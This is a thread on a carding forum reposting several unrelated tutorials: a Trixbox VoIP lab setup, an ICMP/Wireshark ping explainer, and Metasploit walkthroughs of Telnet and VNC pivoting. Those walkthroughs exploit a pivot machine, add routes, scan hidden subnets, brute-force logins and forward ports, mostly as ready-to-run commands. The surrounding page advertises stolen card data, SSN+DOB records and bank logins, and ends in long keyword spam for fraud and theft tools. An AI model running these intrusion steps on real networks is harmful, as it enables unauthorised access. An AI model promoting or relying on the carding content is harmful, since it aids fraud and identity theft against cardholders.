Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc

Announcement :

For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis





PLACE YOUR TEXT HERE FOR ADVERTISE
PLACE YOUR TEXT HERE FOR ADVERTISE
CC+CVV Private Base Wholesale & Retail | 200+ Countries | Rare BINs
Best CC Shop Daily Updates | 200+ Countries | High Quality | 24/7 Fast Support
BlackBet.cc Banks, Shops, Real Docs, SSN+DOB, PayPal, GVoice/Gmail, Lookups









>PLACE TEXT ADVERTISING HERE< &PLACE TEXT ADVERTISING HERE< >PLACE TEXT ADVERTISING HERE< >PLACE TEXT ADVERTISING HERE<





Announcement : Black Hat Forum is one of the Best Black Hat Carding Forum welcome you. We will share great stuff for our loved members, hope you enjoy your stay on our Black Hat Forum and you will return to us EVERYDAY. Stay Safe Enjoy Blackhat Carding Forum.


  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5


[Guide] How to Lab Setup for VOIP Penetration Testing
#1
0
0
Hello friends! Today you will learn how to set up a VOIP server in a virtual machine using tribox 2.8.0.4 ISO image for making phone calls and sending text messages in the local network.
What is VOIP?

Voice over Internet Protocol (also a voice over IP, VoIP or IP telephony) is a methodology and group of technologies for the delivery of voice communications and multimedia sessions over Internet Protocol (IP) networks, such as the Internet.

[To see content please register here]


Let’s start!!
Open VMware and select the option “Create a New Virtual Machine”. This will open a Window, on it click on :

I will install the operating system later
Then click on Next.
[Image: 2.png?w=687&ssl=1]
Now select the 2nd option “Linux” for the guest operating system and select version “Ubuntu”. Then click on next and next as per your requirements.
[Image: 3.png?w=687&ssl=1]
Explore the Custom Hardware Settings for making the following changes:
Click on CD/DVD to browse ISO file “tribox 2.8.0.4”.
Select the Bridged Connection and Enable the Replicate Connection checkbox in the Network Adapter setting.
Then click on Finish.
[Image: 8.png?w=687&ssl=1]
Trixbox is one of the most popular Asterisk-based distribution. Trixbox allows even the novice user to quickly set up a voice over IP phone system and other necessary applications such as MYSQL and more. Trixbox can be configured to handle a single phone line for a home user, several lines for a small office, or several T1s for a million minute a month call center.
It will start rebooting the VM automatically, now for trixbox CE installation follow given below steps:
[Image: 9.png?w=687&ssl=1]
A dialog box will appear for selecting option Keyboard Type and choose option “US” as given in below image. Then click on the OK tab.
[Image: 10.png?w=687&ssl=1]
Another dialog box will ask to choose a time zone, select your preferred time zone. Here I am selecting Asia/ Kolkata Then click on the OK tab.
[Image: 11.png?w=687&ssl=1]
Now enter the Password you want to give for the root user. I had given tribox as a password. Again type confirm password and then click on the OK tab.
[Image: 12.png?w=687&ssl=1]
Now the installation process will start automatically. Be patient as it will take some time. Do not interrupt installation until it completes.

[Image: 13.png?w=687&ssl=1]
Once installation completes, it will ask for login. Type username: root and password: tribox (or whatever you entered earlier)

[Image: 14.png?w=687&ssl=1]
Check network interface using the “ifconfig” command, From here I came to know the VM IP: 192.168.1.218
[Image: 15.png?w=687&ssl=1]
Now open this IP: 192.168.1.218 in Web Browser. Here through Tribox GUI, we are going to create some user accounts by assigning them extension numbers. Here each user will receive 8 digit number for land-line from the service providers.
[Image: 16.png?w=687&ssl=1]
By default tribox, GUI open with user mode and for creating extension number we need to switch into Admin Mode.
Click on Switch option from user mode given on top of the right corner.
[Image: 17.png?w=687&ssl=1]
The authentication is required for login into Admin Mode of tribox.
Now enter the default credentials:
  • Username: maint
  • Password: password

[Image: 18.png?w=687&ssl=1]
You will get a pop-up message for tribox registration, Close this message.
[Image: 19.png?w=687&ssl=1]
At tribox platform you will see server status, now click on PBX option and select PBX setting option from the given menu.
[Image: 21.png?w=687&ssl=1]
Under setup list of Admin select Extensions option as a basic setup.
[Image: 22.png?w=687&ssl=1]
Select device
Now follow the given steps for creating an extension inside the server:
Device: Generic SIP Device
Click on Submit
[Image: 23.png?w=687&ssl=1]
Add extension
User Extension: 1234567 (any 7/8 digit number)
Display Name: ignite (name of user/ customer you want to assign this number)
[Image: 24.png?w=687&ssl=1]
Device options
Secret: 123
dtmfmode: rfc2833
[Image: 25.png?w=687&ssl=1]
Once you have entered the information for creating a new extension click on Submit.
[Image: 26.png?w=687&ssl=1]
Similarly, create one more extension so then we can check communication between both extensions.
From the given image you can see now we had configured two extension 1st for ignite [1234567] and 2nd for raj[12345678].
We had created two extensions one as the caller and other as a receiver. You can create multiple extension as per your requirement.
[Image: 27.png?w=687&ssl=1]

.[Image: 28.1.png?w=687&ssl=1]
Now click on the orange color tile for apply configuration changes to put them into effect
A pop will open here select continue with reload
Now, this is all about server installation and configuration of extension inside it.
[Image: 28.2.png?w=687&ssl=1]
Now download ZOIPER application in your system
Zoiper is a VoIP softphone that lets you send messages, make voice and video calls with your friends, family, colleagues and business partners.
Once it is downloaded it will look like as given below image, now go with a Setting option for configuration of an account which will be able to make a call or receive call from another user.
[Image: 28.png?w=687&ssl=1]
Select account type SIP and click on next.
[Image: 29.png?w=687&ssl=1]
If you remember in tribox GUI we had added an extension 1234567 for ignite now enter that information in account wizard in order to save it as a new contact.
Now enter user number with server IP as given below
[EMAIL=The contents of this section are hidden for your group]The contents of this section are hidden for your group[/EMAIL]
Register or Login

Enter the password for this account.
Click on next.
[Image: 30.png?w=687&ssl=1]
It will auto-detect the account name as shown in the given image. Then click on next.
[Image: 31.png?w=687&ssl=1]
Your one account has been created in the accounted list. Now ignite will be able to make calls or receive calls from another user.
[Image: 32.png?w=687&ssl=1]
We have already created a ignite account in the system through zoiper for making and receiving calls. Now we need to install zoiper on another device for other users also, who will be able to make or receive a call from ignite.
Download zoiper from Google play stores on your android phone.  Run the application after installation.
[Image: 33.png?w=687&ssl=1]
Click on config icon for configuration of a new account in your phone as shown in the given image and select Accounts option from the given list of configuration settings. 
[Image: 34.png?w=687&ssl=1]
Then a new window will open click on add account. A dialog box will appear for account setup click on YES.
[Image: 35.png?w=687&ssl=1]
Now again a new dialog box will pop up the select manual configuration for account setup.
[Image: 36.png?w=687&ssl=1]
Go for SIP as account type you have chosen.
[Image: 37.png?w=687&ssl=1]
Now enter the following information for SIP account setting:
  • Account name: raj
  • Host: 192.168.1.218
  • Username: 12345678
  • Password: 123
Now click on Save.
[Image: 38.png?w=687&ssl=1]
You can see from the given image that account for raj is ready.
Hence we have set up two accounts in zoiper one will act as caller let say raj is caller making call to ignite through his phone and ignite will be a receiver and get an incoming call on the system from raj.
[Image: 39.png?w=687&ssl=1]
As you know we had configured two extensions one for ignite another for raj. Now we are going to test this VOIP setup by making calls from raj.
[Image: 40.png?w=687&ssl=1]
Raj had made the call to ignite by dialing his number 1234567 and when you will perform this you will hear the outgoing bell from your phone.
[Image: 41.png?w=687&ssl=1]
Ignite will get an incoming call on the system as shown in the given image. Click on an answer for accepting a call from raj.
[Image: 42.png?w=687&ssl=1]
From given screenshot you can see that the call is connected and raj and ignite is having a conversation over VOIP call.
[Image: 43.png?w=687&ssl=1]
Great!!! Hence in this way, you can configure your VOIP server for local network and can communicate with multiple users by making calls or chat.

From Wikipedia
The Internet Control Message Protocol (ICMP) is a supporting protocol in the Internet protocol suite. It is used by network devices, including routers, to send error messages and operational information which indicates that a requested service is not available or that a host or router could not be reached.
It is layer 3 i.e. network layer protocol used by the ping command for sending a message through ICMP payload which is encapsulated with IP Header Packet.  According to MTU the size of the ICMP packet cannot be greater than 1500 bytes.
ICMP packet at Network layer
IP header
ICMP header
ICMP payload size
  MTU (1500)
20 bytes
8 bytes
1472 bytes  (maximum)
20 + 8 + 1472 = 1500
[Image: 0.1.png?w=687&ssl=1]
ICMP packet at Data Link layer
Ethernet header
IP header
ICMP header
ICMP payload size
  MTU (1514)
14
20 bytes
8 bytes
1472 bytes  (maximum)
14 + 20 + 8 + 1472 = 1514
ICMP Message code & Packet description with Wireshark
ICMP message contains two types of codes i.e. query and error.
Query: The query messages are the information we get from a router or another destination host.
For example, given below message types are some ICMP query codes:
  • Type 0 = Echo Reply
  • Type 8 = Echo Request
  • Type 9 = Router Advertisement
  • Type 10 = Router Solicitation
  • Type 13 = Timestamp Request
  • Type 14 = Timestamp Reply
A ping command sends an ICMP echo request to the target host. The target host responds with an echo Reply which means the target host is alive.
[Image: 0.png?w=687&ssl=1]
Here we are going to test how ping command helps in identifying an alive host by Pinging host IP.
ping 192.168.0.105
1
ping 192.168.0.105

From the given below image you can see a reply from the host; now notice a few more things as given below:
  • The default size of payload sent by source machine is 32 bytes (request)
  • The same size of payload received by source machine is 32 bytes from Destination machine (reply)
  • TTL = 128 which means host machine is windows system.
  • Total packets are 8, 4 packets of the request and 4 of reply.
[Image: 1.png?w=687&ssl=1]
Look over the sequence of packet transfer between source and destination captured through Wireshark.
Total numbers of packet captured are 8, 4 for request and 4 for reply between the source and destination machine.
The 1st packet is sent by source machine is ICMP echo request and if you look by the given below image, you will observe highlighted text is showing ICMP query code: type 8 echo ping request.
Length of frame is 74 now  as explained in the below table:
Ethernet header
IP header
ICMP header
ICMP payload size
  MTU (1514)
14
20 bytes
8 bytes
32  (default)
14+20+8+32=74
[Image: 2.png?w=687&ssl=1]
Similarly given below image is showing details of 2nd packet i.e.  Echo reply, you can observe that the highlighted text is showing ICMP query code: type 0 echo ping reply. 
[Image: 3.png?w=687&ssl=1]
Error: The error statement messages reports problem which a router or a destination host may generate.
For example: given below message types are some of the ICMP error codes:
  • Type 3 = Destination Unreachable
  • Type 4 = Source Quench
  • Type 5 = Redirect
  • Type 11 = Time Exceeded
  • Type 12 = Parameter Problems
When we ping an IP sometimes we don’t get echo ping reply from the host machine, instead of that, we get some reply such as destination unreachable or time exceeded this is known as ICMP error reporting message. There are so many reasons behind such kind of error message, possibly a host in a  network is down or firewall is blocking your ping request.
[Image: 4.png?w=687&ssl=1]
The 1st packet sends by source machine is ICMP echo request and if you observe by the given below image the highlighted text is showing ICMP query code: type 8 echo ping request.
Similarly given below image is showing the detail of 2nd packet i.e.  Destination unreachable, you can observe that it is showing ICMP error code: type 3. 
[Image: 5.png?w=687&ssl=1]
ping –a 192.168.0.105
1
ping –a 192.168.0.105

-a: Resolve IP addresses to host-name, identify’s that reverse name resolution is carried out on the host IP address. If it is successful, ping shows the matching hostname.
[Image: 10.png?w=687&ssl=1]
From the given below image, you can observe that instead of ICMP protocol the ping request has been sent through NBNS (NetBIOS Name Service)protocol through port 137 which is a UDP port.
[Image: 11.png?w=687&ssl=1]
After applying UDP filter you can read hostname captured by Wireshark “WIN-1GKSSJ7D2AE” is the part of a workgroup.
[Image: 12.png?w=687&ssl=1]
By default, a ping sends 4 packets of the request and receives the same number of the packet as a reply from the host. You can increase or decrease this number of the packet by using given below command.
ping –n 2 192.168.0.105
1
ping –n 2 192.168.0.105

-n: Number of echo requests to send
As we had set -n as 2  packets of request hence we got two packets as a reply.
[Image: 13.png?w=687&ssl=1]
Similarly, we can also set TTL (Time to Live) for echo request packet, by default 4 packet of request query are sent from source machine at the rate of 1 millisecond per packet. Suppose we want to give TTL between two packets, set -i as 5ms so that after the first packet is delivered the second packet is sent after 5ms.
ping –i 5 192.168.0.105
1
ping –i 5 192.168.0.105

-i TTL: Time To Live
[Image: 14.png?w=687&ssl=1]
Let’s verify TTL for a packet sent from source to destination through Wireshark. Now if you observe by the given below image you will notice that every echo ping request packet has TTL 5 but every echo reply has default TTL value i.e.128.
[Image: 15.png?w=687&ssl=1]
ICMP payload description through Wireshark
As we have discussed above default size of ICMP payload is 32 bytes and the maximum is 1472 if the size of the payload packet is greater than 1472 then packet gets fragmented into small packets.
From the given below image, you can observe source has pinged the host which carries default 32 bytes size payload. 
[Image: 16.png?w=687&ssl=1]
Now let check the information payload carries from source to destination using Wireshark. From the given below image, you can read that highlighted texts are alphabets that have been used as 32 bytes payload.
The alphabet is the combination 26 letters but in 32 bytes payload, they are used as:
abcd——uvw are 23 letters only 9 letters needed more to complete 32 bytes therefore again it included 9 alphabets more  i.e. abcdefghi
[Image: 17.png?w=687&ssl=1]
You can reset the size of payload using the following command that will carry echo ping request from a source to destination.
ping -l 33 192.168.0.105
1
ping -l 33 192.168.0.105

As we have seen above the 32 bytes payload carry data in the form of alphabets abcd—-uvw and then abcd—hi. Hence if the size of the payload is 33 then data should start from abcd—-uvw and then abcd—hij.  Alphabet “j” must be the last payload of the data packet.
[Image: 18.png?w=687&ssl=1]
From the given image you can confirm that the Alphabet “j” is the last payload of a data packet, In this way increasing the payload size will add an alphabet letter into the data packet.
Length of the frame has become 75 now as shown in below table:
Ethernet header
IP header
ICMP header
ICMP payload size
  MTU (1514)
14
20 bytes
8 bytes
33  (default)
14+20+8+33=75
[Image: 19.png?w=687&ssl=1]
Now we are sending the maximum size of payload using the following command.
ping -l 1472 192.168.0.105
1
ping -l 1472 192.168.0.105

From the given below image, you can see a reply from the host machine.
[Image: 20.png?w=687&ssl=1]
According to MTU if the size of the payload is set to 1472 then frame size will become 1514 as explain above, let’s verify it from Wireshark.  From given below image you can read length of the frame is 1514 and highlighted text is showing data of 1472 bytes payload.
[Image: 21.png?w=687&ssl=1]
When the size of the payload is greater than 1472 or too large for a network to hold and reach a router, the router breaks it into smaller packets (fragments).
ping -l 1473 192.168.0.105
1
ping -l 1473 192.168.0.105

From the given below image, you can see now the size of the payload is 1473 which carries echo ping request from a source to destination.
[Image: 22.png?w=687&ssl=1]
From the given image you can confirm that when the payload is more than 1472 ICMP packet it gets fragmented as per below table:
Ethernet header
IP header
ICMP header
ICMP payload size
  MTU (1514)
14
20 bytes
8 bytes
1472
14+20+8+1472=1514
14
20

1
35
If you separate Ethernet header and IP header the size of payload will be 1480 bytes as shown below.
[Image: 23.png?w=687&ssl=1]
Using –f option with ping command will not allow packet fragmentation in the network.
ping –f –l 1472 192.168.0.105
1
ping –f –l 1472 192.168.0.105

-f:  Set Don’t Fragment flag in the packet
[Image: 24.png?w=687&ssl=1]
From the given below image you can observe remote host has set (don’t) fragment flag which will not allow the router to fragment the payload packets. Moreover, 1472 bytes payload didn’t need fragmentation by the router.
[Image: 25.png?w=687&ssl=1]
If the packet size 1473 is set with (don’t) fragment flag with ping, the router will reject the packet and will display an ICMP message that the packet needs to be fragmented because of MTU size limit of 1500 bytes
IP header
ICMP header
ICMP payload size
  MTU (1500)
20 bytes
8 bytes
1473 bytes  (without fragment)
More than 1500 bytes  Not possible
[Image: 26.png?w=687&ssl=1]

In our previous tutorial, we had discussed on SSH pivoting and today we are going to discuss Telnet pivoting.
From Offensive Security
Pivoting is a technique to get inside an unreachable network with help of pivot (center point). In simple words, it is an attack through which an attacker can exploit that system which belongs to the different network. For this attack, the attacker needs to exploit the main server that helps the attacker to add himself inside its local network and then the attacker will able to target the client system for the attack.
Lab Setup requirement:
Attacker machine: Kali Linux
Pivot Machine (client): window operating system with two network interface
Target Machine: Ubuntu server (Allow telnet service)
[Image: 0.1.png?w=687&ssl=1]
Exploit pivot machine
Use exploit MS17-010 or multi handler to hack the pivot machine.
sessions
1
sessions

From the given image, you can confirm that I owned a pivot machine (192.168.1.107) meterpreter session1.
[Image: 0.png?w=687&ssl=1]
Check the network interface through the following command:
meterpreter> ifconfig
1
meterpreter> ifconfig

From the given image you can observe two networks interface in pivot’s system 1st for IP 192.168.1.107 through which the attacker is connected and 2nd for IP 10.0.0.20 through which telnet server (targets) are connected.
[Image: 1.png?w=687&ssl=1]
Route Add
Since the attacker belongs to the 192.168.1.1 interface and target belongs to 10.0.0.0 interface, therefore, it is not possible to directly make an attack on the target network until unless the attacker acquires the same network connection. In order to achieve a 10.0.0.0 network attacker need to run the post exploitation “autoroute”.
use post/multi/manage/autoroute
msf post(autoroute) > set session 1
msf post(autoroute) > exploit

1
2
3

use post/multi/manage/autoroute
msf post(autoroute) > set session 1
msf post(autoroute) > exploit

[Image: 2.png?w=687&ssl=1]
This Module will perform an ARP scan for a given IP range through a Meterpreter Session.
use post/windows/gather/arp_scanner
msf post(arp_scanner) > set rhosts 10.0.0.1-30
msf post(arp_scanner) > set session 1
msf post(arp_scanner) > set thread 20
msf post(arp_scanner) > exploit

1
2
3
4
5

use post/windows/gather/arp_scanner
msf post(arp_scanner) > set rhosts 10.0.0.1-30
msf post(arp_scanner) > set session 1
msf post(arp_scanner) > set thread 20
msf post(arp_scanner) > exploit

Here we found a new IP 10.0.0.10 as shown in the given image. Let’s perform TCP port scan for activated services on this machine.
[Image: 3.png?w=687&ssl=1]
This module Enumerates open TCP services by performing a full TCP connect on each port. This does not need administrative privileges on the source machine, which may be useful if pivoting.
use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set ports 23
msf auxiliary(tcp) > set rhosts 10.0.0.10
msf auxiliary(tcp) > set thread 10
msf auxiliary(tcp) >exploit

1
2
3
4
5

use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set ports 23
msf auxiliary(tcp) > set rhosts 10.0.0.10
msf auxiliary(tcp) > set thread 10
msf auxiliary(tcp) >exploit

From given you can observe port 23 is open and we know that port 23 is used for telnet service.
[Image: 4.png?w=687&ssl=1]
Use Telnet login Brute Force Attack
An attacker always tries to make a brute force attack for stealing credential for unauthorized access.
This module will test a telnet login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
Now type the following command to Brute force TELNET login:
use auxiliary/scanner/telnet/telnet_login
msf auxiliary(telnet_login) > set rhosts 10.0.0.10
msf auxiliary(telnet_login) > set user_file /root/Desktop/user
msf auxiliary(telnet_login) > set pass_file /root/Desktop/pass
msf auxiliary(telnet_login) > exploit

1
2
3
4
5

use auxiliary/scanner/telnet/telnet_login
msf auxiliary(telnet_login) > set rhosts 10.0.0.10
msf auxiliary(telnet_login) > set user_file /root/Desktop/user
msf auxiliary(telnet_login) > set pass_file /root/Desktop/pass
msf auxiliary(telnet_login) > exploit

From given image you can observe that TELNET server is not secure against brute force attack because it is showing a matching combination of username: aarti and password: 123 for login simultaneously it has opened victims command shell as session 2
[Image: 5.1.png?w=687&ssl=1]
Let’s count the number of victim sessions we have hold using the following command:
sessions
1
sessions

From the given image you can observe there are two sessions 1st as the meterpreter session of windows system and 2nd as command shell of the telnet server.
[Image: 5.2.png?w=687&ssl=1]
sessions 2
1
sessions 2

Now attacker is command shell of the server, let’s verify through network configuration.
ifconfig
1
ifconfig

From given, you can observe the network IP is 10.0.0.10
[Image: 5.3.png?w=687&ssl=1]

In the previous article we had described VNC penetration testing and VNC tunneling through SSH but today we are going to demonstrate VNC pivoting.
From Offensive Security
Pivoting is a technique to get inside an unreachable network with help of pivot (center point). In simple words, it is an attack through which an attacker can exploit those systems which belong to the different network. For this attack, the attacker needs to exploit the main server that helps the attacker to add himself inside its local network and then the attacker will able to target the client system for the attack.
Lab Setup requirement:
Attacker Machine: Kali Linux
Pivot Machine:  Ubuntu operating system with two network interface
Target Machine: Ubuntu (Allow VNC service)
[Image: 11.png?w=687&ssl=1]
Exploit pivot machine
Generate payload using msfvenom start multi/handler to hack the pivot machine (ubuntu) read the complete article from here and bypass its UAC to achieve admin privileges.
sysinfo
1
sysinfo

From the given image you can confirm that I owned a pivot machine (192.168.1.226) meterpreter session.
[Image: 12.png?w=687&ssl=1]
Check the network interface through the following command:
meterpreter> ifconfig
1
meterpreter> ifconfig

From the given image you can observe two networks interface in pivot’s system 1st for IP 192.168.1.226 through which the attacker is connected and 2nd for IP 10.0.0.10 through which VNC server (targets) are connected.
[Image: 13.png?w=687&ssl=1]
Route Add
Since the attacker belongs to the 192.168.1.1 interface and client belongs to 10.0.0.0 interface, therefore, it is not possible to directly make an attack on client network until unless the attacker acquires the same network connection. In order to achieve a 10.0.0.0 network attacker need to run the post exploitation “autoroute”.
use post/multi/manage/autoroute
msf post(autoroute) > set session 3
msf post(autoroute) > exploit

1
2
3

use post/multi/manage/autoroute
msf post(autoroute) > set session 3
msf post(autoroute) > exploit

[Image: 15.png?w=687&ssl=1]
ARP Sweep to identify Active host
This module will enumerate alive Hosts in the local network using ARP requests. Take help from target network interface 3 as shown above for MAC address and other details.
use auxiliary/scanner/discovery/arp_sweep
msf auxiliary(arp_sweep) >set rhost 10.0.0.1-254
msf auxiliary(arp_sweep) >set shost 10.0.0.10
msf auxiliary(arp_sweep) >set smac 00:0c:29:bf:43:94
msf auxiliary(arp_sweep) >run

1
2
3
4
5

use auxiliary/scanner/discovery/arp_sweep
msf auxiliary(arp_sweep) >set rhost 10.0.0.1-254
msf auxiliary(arp_sweep) >set shost 10.0.0.10
msf auxiliary(arp_sweep) >set smac 00:0c:29:bf:43:94
msf auxiliary(arp_sweep) >run

Here we found a new host IP 10.0.0.20 as shown in the given image. Let’s perform TCP port scan for activated services on this machine.
[Image: 16.png?w=687&ssl=1]
TCP Port Scan
This module will enumerate open TCP port of the target system.
use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set rhosts 10.0.0.20
msf auxiliary(tcp) > set thread 20
msf auxiliary(tcp) >exploit

1
2
3
4

use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set rhosts 10.0.0.20
msf auxiliary(tcp) > set thread 20
msf auxiliary(tcp) >exploit

From given you can observe port 5900 is open and we know that 5900 used for VNC services.
[Image: 17.png?w=687&ssl=1]
Bruteforcing VNC Login
In order to steal password for making unauthorized access in VNC machine apply Brute force attack using password, the dictionary is given below exploit.
use auxiliary/scanner/vnc/vnc_login
msf auxiliary(vnc_login) >set rhosts 10.0.0.20
msf auxiliary(vnc_login) >set pass_file /root/Desktop/pass.txt
msf auxiliary(vnc_login) > run

1
2
3
4

use auxiliary/scanner/vnc/vnc_login
msf auxiliary(vnc_login) >set rhosts 10.0.0.20
msf auxiliary(vnc_login) >set pass_file /root/Desktop/pass.txt
msf auxiliary(vnc_login) > run

Awesome!! From given below image you can observe the same password: 123456 have been found by Metasploit.
[Image: 18.png?w=687&ssl=1]
VNC Port forwarding on Local port
Now Type the following command for port forwarding on localhost.
meterpreter> portfwd add –l 6000 –p 5900 –r 10.0.0.20
1
meterpreter> portfwd add –l 6000 –p 5900 –r 10.0.0.20

-l: This is a local port to listen on.
-p: The remote port to connect on.
-r:  The remote host address to connect on.
[Image: 20.png?w=687&ssl=1]
Now open the terminal and type following command to connect the target machine:
vncviewer 127.0.0.1:6000
1
vncviewer 127.0.0.1:6000

Wonderful!! We had successfully exploited the VNC client by making unauthorized access.
[Image: 22.png?w=687&ssl=1]
Reply







Users browsing this thread:
1 Guest(s)

 


Blackhat Carding forum



Search keywords: the best carding forum, credit card dumps, free credit cards, carding forum, carders forum, wu transfer, western union transfer, hacked ccv, cc dumps, legit carders, altenen hackers, hacking tutorials, free porn acconts, paypal dumps, bank account login, alboraaq hackers, cheap apple items carded, market hackers, fraud market, perfectmoney stealer, platinum card, database dump, atn, how to card btc, free paypal logs, altenen, how to card bitcoins, bitcoin carding, btc carding, amex cc, havij carding tutorial, shop credit card, visa cc, cheap shipping, alboraaq, underground forum, botnet, hacking programs, bitshacking, truehackers, cc stealer, how to get credit cards, dumps, pin, logs, email logs, hacking tools, hacking programs,carding tools, ccv checker, ccv balance checker, carding tutorials, mg transfer, wu transf, bank transfer, card clone, WebMoney carding, card clone, the best hacking country, india hackers team, alboraaq , pakistan hackers, wu transfer to nigeria, wu bug, wu transfer, iPhone carding shipping, hacking and carding forum, carding stuff, porn accounts, x'xx passwords, WebMoney hacking, abh cc live, fresh smtp, hacking forum scam free smtp, wmz carding , spam paypal, caring, true carders, carding board, what is the best hacking forum, www.hackingforum.ru, www.carderscave.ru, www.darkgeo.com, www.darkgeo.su, www.darkgeo.ru, the best hacking forum, freedom to palestine, indian hackers team, spaming tools, ams fresh spaming, inbox spaming, fresh leads, proxy list, bitcoin wallet stealer, how to hack a bitcoin wallet, perfect money adder, hacking forum rip, carding board, western union transfer only for real hackers, carding 2020, carders 2020, carders forum 2020, carding forum 2020, hacking forum 2020, fraud market 2020, carding tutorials 2020, carding forum 2020, carders forum 2020, carding tutorials 2020, carders 2020, hackers forum 2020, hacking forum 2020, fraud market 2020, hacked wu 2020, carded iphone 2020, cardingf.com. Carding forum, Carders Forum, Hacking Forum, Hackers Forum, Cheap WU Transfer, CCV Dumps, Legit Carders 2020, ATN Team, Altenen, Hacking Tutorials, Free Premium Porn Accounts, Carding Tools 2020, Fraud Carding, Fraudsters Marketplace, Carding Forum Scam, Inbox Spamming, Free Mailer PHP, Free VPN 2020, Best VPN 2020, AlphaBay Market, Free Fresh Mail Leads, Real Hacker Forum, Alboraaq Review, Alboraaq Hackers, Perfect Money Stealer, Darknet Forums, Darknet Hackers, Darknet Carders, Cardable Websites 2020, Buy Credit Card Dumps, Western Union Generator, Money Gram Transfers Cheap, Free CVV, Free RDP, Cheap RDP, Amazon Carding 2020, NonVBV Cardable Websites, TOR VPN 2020, Russian Carding Forum, UK Carding Forums, Bitcoin Wallet Stealer, Bitcoin Carding, Bank Stealer, Hacked Bank Logins, Bank Logins, Free Keyloggers 2020, Best Keylogger Download, Free Receipt Generator, Card Bitcoins easy, Amazon method, Best Pakistan Carders, Dumps Section, Legit Carding, Unseen, Tutamail, Deepdotweb, CC Live, Free premium logs, iPhone 6s Carded, Cheap Electronics Carding, Black Marketplace, Cheap Bank Transfers, Carding Tools, Havij Hacking, India Hackers, Cheap Apple Carding 2020, PayPal Dumps Logs, Market Hackers, Fresh email logs, btc carding, amex cc, havij carding tutorial, shop credit card, visa cc, cheap shipping, alboraaq, underground forum, botnet, hacking programs, bitshacking, truehackers, cc stealer, how to get credit cards, dumps, pin, logs, email logs, hacking tools, hacking programs, carding tools, ccv checker, ccv balance checker, carding tutorials, mg transfer, wu transf, bank transfer, card clone, hacking stuff, card clone, the best hacking country, india hackers team, alboraaq scamming, pakistan hackers, wu transfer to nigeria, wu bug, wu transfer, iPhone carding shipping, hacking and carding forum, carding stuff, porn accounts, xxx passwords, xxx username and passwords, abh cc live, fresh smtp, hacking forum scam free smtp, ams spamming, spam paypal, caring, true carders, carding board, what is the best hacking forum, the best hacking forum, freedom to palestine, indian hackers team, spaming tools, ams fresh spaming, inbox spaming, the best carding forum, credit card dumps, free credit cards, carding forum, carders forum, wu transfer, western union transfer, hacked ccv, cc dumps, legit carders, altenen hackers, hacking tutorials, free porn acconts, paypal dumps, bank account login, alboraaq hackers, cheap apple items carded, market hackers, fraud market, perfectmoney stealer, platinum card, database dump, atn, how to card btc, free paypal logs, altenen, how to card bitcoins, bitcoin carding, fresh leads, proxy list, bitcoin wallet stealer, how to hack a bitcoin wallet, perfect money adder, hacking forum rip, carding board, western union transfer, carding 2020, carders 2020, carders forum 2020, carding forum 2020, hacking forum 2020, fraud market 2020, carding tutorials 2020, carding forum 2020, carders forum 2020, carding tutorials 2020, carders 2020, hackers forum 2020, hacking forum 2020, fraud market 2020, hacked wu 2020, carded iphone 2020, cardingf.com, altenen, altenen.com, alboraaq, alboraaq.com